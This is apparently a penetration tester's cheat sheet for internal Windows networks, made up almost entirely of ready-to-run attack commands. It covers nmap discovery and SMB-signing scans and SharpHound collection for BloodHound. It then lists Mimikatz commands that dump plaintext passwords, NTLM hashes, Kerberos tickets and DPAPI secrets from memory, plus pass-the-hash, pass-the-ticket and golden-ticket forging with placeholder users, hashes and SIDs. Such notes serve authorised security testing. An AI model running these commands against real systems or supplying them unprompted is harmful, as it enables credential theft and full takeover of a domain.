Internal (Windows)

General

We should verify if the machine is domain joined or not.

nmap -sn -iL targets.txt -oG - | ForEach-Object { if ($_ -match "Up$") { ($_ -split ' ')[1] } } > up-hosts.txt

nmap -p 80 --open -iL targets.txt > 80.txt

nmap -p 445 -iL uphosts.txt --script smb2-security-mode.nse > smb-signing-not-required.txt

nmap -Pn -sV -p 161 --script=snmp-info IP

Select-String -Path "input.txt" -Pattern '\b(?:\d{1,3}\.){3}\d{1,3}\b' | ForEach-Object { $_.Matches.Value } > output.txt

Ingest Files for bloodhound

Sharphound.exe -u USER -p 'PASSWORD' -d DOMAIN -c All

privilege::debug

sekurlsa::logonpasswords

sekurlsa::logonPasswords full

sekurlsa::tickets /export

sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:HASH /run:cmd

Dump and export Kerberos tickets from memory associated with active user sessions

kerberos::list /export

kerberos::ptt c:\TICKET

kerberos::golden /admin:DOMAIN-ADMIN /domain:DOMAIN /sid:USER-SID /krbtgt:KRBTGT /ticket:TICKET

kerberos

sekurlsa::ekeys

Extract and decrypt credentials protected by DPAPI (Data Protection API) from memory

sekurlsa::dpapi

Last updated 21 hours ago